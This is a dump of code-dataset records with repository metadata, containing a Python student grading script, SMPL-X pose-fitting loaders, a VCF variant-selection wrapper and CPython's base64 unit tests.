| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1367201e3118f25640a5bbd95836976d130709a4
| 2,403
|
py
|
Python
|
grading_program.py
|
ByeonghoonJeon/Student-Grading
|
eee55638aee4390d7758c1204b85cce7279ccdf7
|
[
"MIT"
] | null | null | null |
grading_program.py
|
ByeonghoonJeon/Student-Grading
|
eee55638aee4390d7758c1204b85cce7279ccdf7
|
[
"MIT"
] | null | null | null |
grading_program.py
|
ByeonghoonJeon/Student-Grading
|
eee55638aee4390d7758c1204b85cce7279ccdf7
|
[
"MIT"
] | null | null | null |
# 1. Create students score dictionary.
students_score = {}
# 2. Input student's name and check if input is correct. (Alphabet, period, and blank only.)
# 2.1 Create a function that evaluates the validity of the name.
def check_name(name):
# 2.1.1 Remove periods and blanks and check whether the name consists only of alphabetic characters.
# 2.1.1.1 Make a list of spelling in the name.
list_of_spelling = list(name)
# 2.1.1.2 Remove period and blank from the list.
while "." in list_of_spelling:
list_of_spelling.remove(".")
while " " in list_of_spelling:
list_of_spelling.remove(" ")
# 2.1.1.3 Convert the list to a string.
list_to_string = ""
list_to_string = list_to_string.join(list_of_spelling)
# 2.1.1.4 Return whether the string is alphabetic.
return list_to_string.isalpha()
while True:
# 2.2 Input student's name.
name = input("Please input student's name. \n")
# 2.3 Check if the name is alphabetic. If not, ask to input a correct name again.
while not check_name(name):
name = input("Please input student's name. (Alphabet and period only.)\n")
# 3. Input student's score and check if input is correct. (digits only and between zero and 100)
score = input(f"Please input {name}'s score.(0 ~ 100)\n")
while not score.isdigit() or int(score) not in range(0, 101):
score = input("Please input valid numbers only.(Number from zero to 100.)\n")
students_score[name] = score
# 4. Ask another student's information.
another_student = input(
"Do you want to input another student's information as well? (Y/N)\n"
)
while another_student.lower() not in ("yes", "y", "n", "no"):
# 4.1 Check if the input is valid.
another_student = input("Please input Y/N only.\n")
if another_student.lower() in ("yes", "y"):
continue
elif another_student.lower() in ("no", "n"):
break
for student in students_score:
score = students_score[student]
score = int(score)
if score >= 90:
students_score[student] = "A"
elif score in range(70, 90):
students_score[student] = "B"
elif score in range(50, 70):
students_score[student] = "C"
elif score in range(40, 50):
students_score[student] = "D"
else:
students_score[student] = "F"
print(students_score)
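# --- Illustrative sketch (not part of the original script) ---
# The score-to-grade mapping above, expressed as a reusable lookup and checked
# against a few sample values.
_bands = [(90, "A"), (70, "B"), (50, "C"), (40, "D"), (0, "F")]
_grade = lambda s: next(letter for cutoff, letter in _bands if int(s) >= cutoff)
assert _grade(95) == "A" and _grade(70) == "B" and _grade(39) == "F"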
| 36.969231
| 100
| 0.646275
| 373
| 2,403
| 4.061662
| 0.243968
| 0.094389
| 0.064686
| 0.044884
| 0.179538
| 0.155776
| 0.124092
| 0.054125
| 0.054125
| 0
| 0
| 0.032364
| 0.241365
| 2,403
| 64
| 101
| 37.546875
| 0.798683
| 0.303787
| 0
| 0
| 0
| 0
| 0.182037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0
| 0
| 0.047619
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1368b69e2269d6b7303299c5097db81eca903217
| 6,708
|
py
|
Python
|
extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py
|
wangxihao/rgbd-kinect-pose
|
03180723c99759ba2500bcd42b5fe7a1d26eb507
|
[
"MIT"
] | 1
|
2022-02-07T06:12:26.000Z
|
2022-02-07T06:12:26.000Z
|
extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py
|
wangxihao/rgbd-kinect-pose
|
03180723c99759ba2500bcd42b5fe7a1d26eb507
|
[
"MIT"
] | null | null | null |
extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py
|
wangxihao/rgbd-kinect-pose
|
03180723c99759ba2500bcd42b5fe7a1d26eb507
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
import os.path as osp
import json
from human_body_prior.tools.model_loader import load_vposer
import torch
vposer_ckpt = '/Vol1/dbstore/datasets/a.vakhitov/projects/pykinect_fresh/smplify-x/smplify-x-data/vposer_v1_0/'
def load_avakhitov_fits_vposer(vposer, part_path, dev_lbl):
poses = np.load(part_path + '/poses.npy')[:-1]
face_expressions = np.load(part_path + '/expressions.npy')[:-1] * 1e2
betas = np.load(part_path + '/betas.npy')
fid_lst = np.load(part_path + '/fid_lst.npy')
with open(part_path + '/config.json', 'r') as f:
config = json.load(f)
# do we use vposer embeddings
is_vposer = config['is_vposer']
# gender of a subject
is_male = config['is_male']
# id of a device (used to decode the rigid pose of the device)
assert len(fid_lst) == len(poses), f'{len(fid_lst)} != {len(poses)}'
assert len(fid_lst) == len(face_expressions), f'{len(fid_lst)} != {len(face_expressions)}'
n = len(poses)
frame_index2fit_index = {
fid_lst[i]: i
for i in range(n)
}
# load the device pose
dev_lst = config['dev_lst']
dev_id = 0
while dev_lst[dev_id] != dev_lbl:
dev_id += 1
dev_orient = None
dev_trans = None
if dev_id > 0:
dev_orient = np.load(part_path + '/dev_orient.npy')
dev_trans = np.load(part_path + '/dev_trans.npy')
rot = poses[:, -3:]
trans = poses[:, -6:-3]
if is_vposer:
pose_body_vp = torch.tensor(poses[:, 0:32])
# convert from vposer to rotation matrices
pose_body_list = []
for i in range(n):
pose_body_mats = vposer.decode(pose_body_vp[i]).reshape(-1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros(63)
for j in range(0, pose_body_mats.shape[0]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[j])
pose_body[3 * j: 3 * j + 3] = rot_vec.reshape(-1)
pose_body_list.append(pose_body)
pose_body = np.array(pose_body_list)
pose_jaw = poses[:, 32:35]
pose_eye = poses[:, 35:41]
pose_hand = poses[:, 41:-6]
else:
pose_body = poses[:, 0:63]
pose_jaw = poses[:, 63:66]
pose_eye = poses[:, 66:72]
pose_hand = poses[:, 72:-6]
if dev_orient is not None:
for i in range(n):
rot_mat = cv2.Rodrigues(rot[i].reshape(3, 1))[0]
dev_mat = cv2.Rodrigues(dev_orient.reshape(3, 1))[0]
rot_mat = dev_mat @ rot_mat
rot[i] = cv2.Rodrigues(rot_mat)[0].reshape(-1)
trans[i] = (dev_mat @ trans[i].reshape(3, 1) + dev_trans.reshape(3, 1)).reshape(-1)
result = {
'global_rvec': rot,
'global_tvec': trans,
'body_pose': pose_body,
'hand_pose': pose_hand,
'jaw_pose': pose_jaw,
'eye_pose': pose_eye,
'face_expression': face_expressions,
'betas': betas,
'n': n,
'frame_index2fit_index': frame_index2fit_index,
'is_male': is_male,
'is_vposer': is_vposer
}
return result
def load_avakhitov_fits(dp, load_betas=True, load_body_poses=True, load_expressions=False, load_fid_lst=True):
result = dict()
for flag, k, fn_no_ext in [
[load_betas, 'betas', 'betas'],
[load_body_poses, 'body_poses', 'poses'],
[load_expressions, 'expressions', 'expressions'],
[load_fid_lst, 'fid_lst', 'fid_lst']
]:
if flag:
load_fp = osp.join(dp, f'{fn_no_ext}.npy')
try:
loaded = np.load(load_fp)
except Exception:
print(load_fp)
raise
if fn_no_ext == 'poses':
#load the vposer model
if loaded.shape[1] == 69:
pose_body = loaded[:, 0:32]
else:
vposer, _ = load_vposer(vposer_ckpt, vp_model='snapshot')
vposer.eval()
pose_body_vp = torch.tensor(loaded[:, 0:32])
#convert from vposer to rotation matrices
pose_body_mats = vposer.decode(pose_body_vp).reshape(len(loaded), -1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros((pose_body_mats.shape[0], 63))
for i in range(0, pose_body_mats.shape[0]):
for j in range(0, pose_body_mats.shape[1]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i,j])
pose_body[i, 3*j : 3*j+3] = rot_vec.reshape(-1)
result[k] = pose_body
result['global_rvecs'] = loaded[:, -3:]
result['global_tvecs'] = loaded[:, -6:-3]
result['n'] = len(loaded)
else:
result[k] = loaded
return result
def batch_rodrigues(rot_vecs, epsilon=1e-8, dtype=torch.float32):
''' Calculates the rotation matrices for a batch of rotation vectors
Parameters
----------
rot_vecs: torch.tensor Nx3
array of N axis-angle vectors
Returns
-------
R: torch.tensor Nx3x3
The rotation matrices for the given axis-angle parameters
'''
batch_size = rot_vecs.shape[0]
device = rot_vecs.device
angle = torch.norm(rot_vecs + 1e-8, dim=1, keepdim=True)
rot_dir = rot_vecs / angle
cos = torch.unsqueeze(torch.cos(angle), dim=1)
sin = torch.unsqueeze(torch.sin(angle), dim=1)
# Bx1 arrays
rx, ry, rz = torch.split(rot_dir, 1, dim=1)
K = torch.zeros((batch_size, 3, 3), dtype=dtype, device=device)
zeros = torch.zeros((batch_size, 1), dtype=dtype, device=device)
K = torch.cat([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1) \
.view((batch_size, 3, 3))
ident = torch.eye(3, dtype=dtype, device=device).unsqueeze(dim=0)
rot_mat = ident + sin * K + (1 - cos) * torch.bmm(K, K)
return rot_mat
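# --- Illustrative check (not part of the original module) ---
# batch_rodrigues should agree with cv2.Rodrigues for a single axis-angle vector.
_vec = np.array([[0.1, -0.2, 0.3]], dtype=np.float32)
_R_batch = batch_rodrigues(torch.from_numpy(_vec)).numpy()[0]
_R_cv, _ = cv2.Rodrigues(_vec.reshape(3, 1))
assert np.allclose(_R_batch, _R_cv, atol=1e-5)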
def get_selected_ids(id_sel_set, req_ids):
ss_sort = np.argsort(id_sel_set)
req_sort = np.argsort(req_ids)
id_ss_srt = id_sel_set[ss_sort]
id_ss_pos = np.arange(0, len(id_sel_set))[ss_sort]
req_srt = req_ids[req_sort]
req_srt_pos = -1 * np.ones(len(req_srt), dtype=int)
i = 0
j = 0
while i < len(id_ss_srt) and j < len(req_srt):
if req_srt[j] == id_ss_srt[i]:
req_srt_pos[j] = id_ss_pos[i]
i += 1
j += 1
elif req_srt[j] < id_ss_srt[i]:
j += 1
elif id_ss_srt[i] < req_srt[j]:
i += 1
req_ids_ans = -1 * np.ones(len(req_srt), dtype=int)
req_ids_ans[req_sort] = req_srt_pos
return req_ids_ans
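# --- Illustrative check (not part of the original module) ---
# get_selected_ids returns, for each requested id, its position in id_sel_set,
# or -1 when the id is absent.
_sel = np.array([10, 20, 30, 40])
_req = np.array([30, 10, 99])
assert get_selected_ids(_sel, _req).tolist() == [2, 0, -1]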
| 35.120419
| 118
| 0.570662
| 978
| 6,708
| 3.679959
| 0.201431
| 0.055571
| 0.026674
| 0.02334
| 0.23312
| 0.145874
| 0.125313
| 0.110031
| 0.080022
| 0.061128
| 0
| 0.02836
| 0.295617
| 6,708
| 190
| 119
| 35.305263
| 0.733333
| 0.073196
| 0
| 0.089041
| 0
| 0.006849
| 0.082681
| 0.022668
| 0
| 0
| 0
| 0
| 0.013699
| 1
| 0.027397
| false
| 0
| 0.041096
| 0
| 0.09589
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136925370fda5dbcb2e2d6d5e61c676370502bb7
| 904
|
py
|
Python
|
scripts/VCF/UTILS/select_variants.py
|
elowy01/igsr_analysis
|
ffea4885227c2299f886a4f41e70b6e1f6bb43da
|
[
"Apache-2.0"
] | 3
|
2018-04-20T15:04:34.000Z
|
2022-03-30T06:36:02.000Z
|
scripts/VCF/UTILS/select_variants.py
|
elowy01/igsr_analysis
|
ffea4885227c2299f886a4f41e70b6e1f6bb43da
|
[
"Apache-2.0"
] | 7
|
2019-06-06T09:22:20.000Z
|
2021-11-23T17:41:52.000Z
|
scripts/VCF/UTILS/select_variants.py
|
elowy01/igsr_analysis
|
ffea4885227c2299f886a4f41e70b6e1f6bb43da
|
[
"Apache-2.0"
] | 5
|
2017-11-02T11:17:35.000Z
|
2021-12-11T19:34:09.000Z
|
from VcfFilter import VcfFilter
import argparse
import os
#get command line arguments
parser = argparse.ArgumentParser(description='Script to select a certain variant type from a VCF file')
#parameters
parser.add_argument('--bcftools_folder', type=str, required=True, help='Folder containing the Bcftools binary' )
parser.add_argument('--filename', type=str, required=True, help='Name (without the fullpath) of the VCF file that will be analysed. It assumes that the filename format is for example lc_bams.gatk.xxxx.vcf.gz, where lc_bams is the analysis group and gatk is the method used' )
parser.add_argument('--type', type=str, required=False, help='Type of variant to select. i.e. snps/indels etc' )
args = parser.parse_args()
if __name__ == '__main__':
vcf_f=VcfFilter(vcf=args.filename,bcftools_folder=args.bcftools_folder)
vcf_f.filter_by_variant_type(type=args.type)
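# Illustrative invocation (not part of the original script); the folder and file
# name below are hypothetical, following the format described in the --filename help text:
#   python select_variants.py --bcftools_folder /opt/bcftools \
#       --filename lc_bams.gatk.20190312.vcf.gz --type snps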
| 39.304348
| 275
| 0.766593
| 138
| 904
| 4.862319
| 0.521739
| 0.040238
| 0.076006
| 0.056632
| 0.068554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136062
| 904
| 22
| 276
| 41.090909
| 0.859155
| 0.039823
| 0
| 0
| 0
| 0.090909
| 0.446882
| 0.028868
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.272727
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13695de67e652f576d889f205ef664189b73d45b
| 14,680
|
py
|
Python
|
site/tests/unittests/test/test_base64.py
|
martinphellwig/brython_wf
|
e169afc1e048cba0c12118b4cd6f109df6fe67c9
|
[
"BSD-3-Clause"
] | 652
|
2015-07-26T00:00:17.000Z
|
2022-02-24T18:30:04.000Z
|
site/tests/unittests/test/test_base64.py
|
martinphellwig/brython_wf
|
e169afc1e048cba0c12118b4cd6f109df6fe67c9
|
[
"BSD-3-Clause"
] | 8
|
2015-09-07T03:38:19.000Z
|
2021-05-23T03:18:51.000Z
|
check-python33-manual/samples/standard_library_337/Lib/test/test_base64.py
|
DaveKaretnyk/parsing-utils2
|
40085bbd399fa605f2f2a4708d385a64ffc907de
|
[
"MIT"
] | 40
|
2015-07-24T19:45:08.000Z
|
2021-11-01T14:54:56.000Z
|
import unittest
from test import support
import base64
import binascii
import os
import sys
import subprocess
class LegacyBase64TestCase(unittest.TestCase):
def test_encodebytes(self):
eq = self.assertEqual
eq(base64.encodebytes(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=\n")
eq(base64.encodebytes(b"a"), b"YQ==\n")
eq(base64.encodebytes(b"ab"), b"YWI=\n")
eq(base64.encodebytes(b"abc"), b"YWJj\n")
eq(base64.encodebytes(b""), b"")
eq(base64.encodebytes(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n")
# Non-bytes
eq(base64.encodebytes(bytearray(b'abc')), b'YWJj\n')
self.assertRaises(TypeError, base64.encodebytes, "")
def test_decodebytes(self):
eq = self.assertEqual
eq(base64.decodebytes(b"d3d3LnB5dGhvbi5vcmc=\n"), b"www.python.org")
eq(base64.decodebytes(b"YQ==\n"), b"a")
eq(base64.decodebytes(b"YWI=\n"), b"ab")
eq(base64.decodebytes(b"YWJj\n"), b"abc")
eq(base64.decodebytes(b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n"),
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}")
eq(base64.decodebytes(b''), b'')
# Non-bytes
eq(base64.decodebytes(bytearray(b'YWJj\n')), b'abc')
self.assertRaises(TypeError, base64.decodebytes, "")
def test_encode(self):
eq = self.assertEqual
from io import BytesIO, StringIO
infp = BytesIO(b'abcdefghijklmnopqrstuvwxyz'
b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
b'0123456789!@#0^&*();:<>,. []{}')
outfp = BytesIO()
base64.encode(infp, outfp)
eq(outfp.getvalue(),
b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE'
b'RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT'
b'Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('abc'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'abc'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('abc'), StringIO())
def test_decode(self):
from io import BytesIO, StringIO
infp = BytesIO(b'd3d3LnB5dGhvbi5vcmc=')
outfp = BytesIO()
base64.decode(infp, outfp)
self.assertEqual(outfp.getvalue(), b'www.python.org')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'YWJj\n'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), StringIO())
class BaseXYTestCase(unittest.TestCase):
def test_b64encode(self):
eq = self.assertEqual
# Test default alphabet
eq(base64.b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.b64encode(b'\x00'), b'AA==')
eq(base64.b64encode(b"a"), b"YQ==")
eq(base64.b64encode(b"ab"), b"YWI=")
eq(base64.b64encode(b"abc"), b"YWJj")
eq(base64.b64encode(b""), b"")
eq(base64.b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Test with arbitrary alternative characters
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=b'*$'), b'01a*b$cd')
# Non-bytes
eq(base64.b64encode(bytearray(b'abcd')), b'YWJjZA==')
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=bytearray(b'*$')),
b'01a*b$cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.b64encode, "")
self.assertRaises(TypeError, base64.b64encode, b"", altchars="")
# Test standard alphabet
eq(base64.standard_b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.standard_b64encode(b"a"), b"YQ==")
eq(base64.standard_b64encode(b"ab"), b"YWI=")
eq(base64.standard_b64encode(b"abc"), b"YWJj")
eq(base64.standard_b64encode(b""), b"")
eq(base64.standard_b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Non-bytes
eq(base64.standard_b64encode(bytearray(b'abcd')), b'YWJjZA==')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.standard_b64encode, "")
# Test with 'URL safe' alternative characters
eq(base64.urlsafe_b64encode(b'\xd3V\xbeo\xf7\x1d'), b'01a-b_cd')
# Non-bytes
eq(base64.urlsafe_b64encode(bytearray(b'\xd3V\xbeo\xf7\x1d')), b'01a-b_cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.urlsafe_b64encode, "")
def test_b64decode(self):
eq = self.assertEqual
tests = {b"d3d3LnB5dGhvbi5vcmc=": b"www.python.org",
b'AA==': b'\x00',
b"YQ==": b"a",
b"YWI=": b"ab",
b"YWJj": b"abc",
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==":
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}",
b'': b'',
}
for data, res in tests.items():
eq(base64.b64decode(data), res)
eq(base64.b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b64decode(bytearray(b"YWJj")), b"abc")
# Test with arbitrary alternative characters
tests_altchars = {(b'01a*b$cd', b'*$'): b'\xd3V\xbeo\xf7\x1d',
}
for (data, altchars), res in tests_altchars.items():
data_str = data.decode('ascii')
altchars_str = altchars.decode('ascii')
eq(base64.b64decode(data, altchars=altchars), res)
eq(base64.b64decode(data_str, altchars=altchars), res)
eq(base64.b64decode(data, altchars=altchars_str), res)
eq(base64.b64decode(data_str, altchars=altchars_str), res)
# Test standard alphabet
for data, res in tests.items():
eq(base64.standard_b64decode(data), res)
eq(base64.standard_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.standard_b64decode(bytearray(b"YWJj")), b"abc")
# Test with 'URL safe' alternative characters
tests_urlsafe = {b'01a-b_cd': b'\xd3V\xbeo\xf7\x1d',
b'': b'',
}
for data, res in tests_urlsafe.items():
eq(base64.urlsafe_b64decode(data), res)
eq(base64.urlsafe_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.urlsafe_b64decode(bytearray(b'01a-b_cd')), b'\xd3V\xbeo\xf7\x1d')
def test_b64decode_padding_error(self):
self.assertRaises(binascii.Error, base64.b64decode, b'abc')
self.assertRaises(binascii.Error, base64.b64decode, 'abc')
def test_b64decode_invalid_chars(self):
# issue 1466065: Test some invalid characters.
tests = ((b'%3d==', b'\xdd'),
(b'$3d==', b'\xdd'),
(b'[==', b''),
(b'YW]3=', b'am'),
(b'3{d==', b'\xdd'),
(b'3d}==', b'\xdd'),
(b'@@', b''),
(b'!', b''),
(b'YWJj\nYWI=', b'abcab'))
for bstr, res in tests:
self.assertEqual(base64.b64decode(bstr), res)
self.assertEqual(base64.b64decode(bstr.decode('ascii')), res)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr, validate=True)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr.decode('ascii'), validate=True)
def test_b32encode(self):
eq = self.assertEqual
eq(base64.b32encode(b''), b'')
eq(base64.b32encode(b'\x00'), b'AA======')
eq(base64.b32encode(b'a'), b'ME======')
eq(base64.b32encode(b'ab'), b'MFRA====')
eq(base64.b32encode(b'abc'), b'MFRGG===')
eq(base64.b32encode(b'abcd'), b'MFRGGZA=')
eq(base64.b32encode(b'abcde'), b'MFRGGZDF')
# Non-bytes
eq(base64.b32encode(bytearray(b'abcd')), b'MFRGGZA=')
self.assertRaises(TypeError, base64.b32encode, "")
def test_b32decode(self):
eq = self.assertEqual
tests = {b'': b'',
b'AA======': b'\x00',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data), res)
eq(base64.b32decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b32decode(bytearray(b'MFRGG===')), b'abc')
def test_b32decode_casefold(self):
eq = self.assertEqual
tests = {b'': b'',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
# Lower cases
b'me======': b'a',
b'mfra====': b'ab',
b'mfrgg===': b'abc',
b'mfrggza=': b'abcd',
b'mfrggzdf': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data, True), res)
eq(base64.b32decode(data.decode('ascii'), True), res)
self.assertRaises(binascii.Error, base64.b32decode, b'me======')
self.assertRaises(binascii.Error, base64.b32decode, 'me======')
# Mapping zero and one
eq(base64.b32decode(b'MLO23456'), b'b\xdd\xad\xf3\xbe')
eq(base64.b32decode('MLO23456'), b'b\xdd\xad\xf3\xbe')
map_tests = {(b'M1023456', b'L'): b'b\xdd\xad\xf3\xbe',
(b'M1023456', b'I'): b'b\x1d\xad\xf3\xbe',
}
for (data, map01), res in map_tests.items():
data_str = data.decode('ascii')
map01_str = map01.decode('ascii')
eq(base64.b32decode(data, map01=map01), res)
eq(base64.b32decode(data_str, map01=map01), res)
eq(base64.b32decode(data, map01=map01_str), res)
eq(base64.b32decode(data_str, map01=map01_str), res)
self.assertRaises(binascii.Error, base64.b32decode, data)
self.assertRaises(binascii.Error, base64.b32decode, data_str)
def test_b32decode_error(self):
for data in [b'abc', b'ABCDEF==', b'==ABCDEF']:
with self.assertRaises(binascii.Error):
base64.b32decode(data)
with self.assertRaises(binascii.Error):
base64.b32decode(data.decode('ascii'))
def test_b16encode(self):
eq = self.assertEqual
eq(base64.b16encode(b'\x01\x02\xab\xcd\xef'), b'0102ABCDEF')
eq(base64.b16encode(b'\x00'), b'00')
# Non-bytes
eq(base64.b16encode(bytearray(b'\x01\x02\xab\xcd\xef')), b'0102ABCDEF')
self.assertRaises(TypeError, base64.b16encode, "")
def test_b16decode(self):
eq = self.assertEqual
eq(base64.b16decode(b'0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode(b'00'), b'\x00')
eq(base64.b16decode('00'), b'\x00')
# Lower case is not allowed without a flag
self.assertRaises(binascii.Error, base64.b16decode, b'0102abcdef')
self.assertRaises(binascii.Error, base64.b16decode, '0102abcdef')
# Case fold
eq(base64.b16decode(b'0102abcdef', True), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102abcdef', True), b'\x01\x02\xab\xcd\xef')
# Non-bytes
eq(base64.b16decode(bytearray(b"0102ABCDEF")), b'\x01\x02\xab\xcd\xef')
def test_decode_nonascii_str(self):
decode_funcs = (base64.b64decode,
base64.standard_b64decode,
base64.urlsafe_b64decode,
base64.b32decode,
base64.b16decode)
for f in decode_funcs:
self.assertRaises(ValueError, f, 'with non-ascii \xcb')
def test_ErrorHeritage(self):
self.assertTrue(issubclass(binascii.Error, ValueError))
class TestMain(unittest.TestCase):
def tearDown(self):
if os.path.exists(support.TESTFN):
os.unlink(support.TESTFN)
def get_output(self, *args, **options):
args = (sys.executable, '-m', 'base64') + args
return subprocess.check_output(args, **options)
def test_encode_decode(self):
output = self.get_output('-t')
self.assertSequenceEqual(output.splitlines(), (
b"b'Aladdin:open sesame'",
br"b'QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n'",
b"b'Aladdin:open sesame'",
))
def test_encode_file(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'a\xffb\n')
output = self.get_output('-e', support.TESTFN)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
with open(support.TESTFN, 'rb') as fp:
output = self.get_output('-e', stdin=fp)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
def test_decode(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'Yf9iCg==')
output = self.get_output('-d', support.TESTFN)
self.assertEqual(output.rstrip(), b'a\xffb')
def test_main():
support.run_unittest(__name__)
if __name__ == '__main__':
test_main()
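# Illustrative sketch (not part of the test module): the round-trip property the
# encode/decode tests above exercise, in a single line.
assert base64.b64decode(base64.b64encode(b"www.python.org")) == b"www.python.org"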
| 41.586402
| 83
| 0.570981
| 1,630
| 14,680
| 5.084663
| 0.119632
| 0.072394
| 0.04223
| 0.052365
| 0.65432
| 0.563827
| 0.471646
| 0.379585
| 0.239503
| 0.161438
| 0
| 0.073781
| 0.276158
| 14,680
| 352
| 84
| 41.704545
| 0.706192
| 0.045095
| 0
| 0.239286
| 0
| 0
| 0.194524
| 0.087575
| 0
| 0
| 0
| 0
| 0.160714
| 1
| 0.078571
| false
| 0
| 0.032143
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136b2299eb41b7ded97c6048734842406f59258d
| 3,437
|
py
|
Python
|
ansys/dpf/core/errors.py
|
TheGoldfish01/pydpf-core
|
75ca8a180454f94cedafbc68c1d6f20dcfc4c795
|
[
"MIT"
] | 11
|
2021-01-31T15:50:02.000Z
|
2021-10-01T23:15:38.000Z
|
ansys/dpf/core/errors.py
|
TheGoldfish01/pydpf-core
|
75ca8a180454f94cedafbc68c1d6f20dcfc4c795
|
[
"MIT"
] | 46
|
2021-01-14T05:00:50.000Z
|
2021-10-06T18:30:37.000Z
|
ansys/dpf/core/errors.py
|
TheGoldfish01/pydpf-core
|
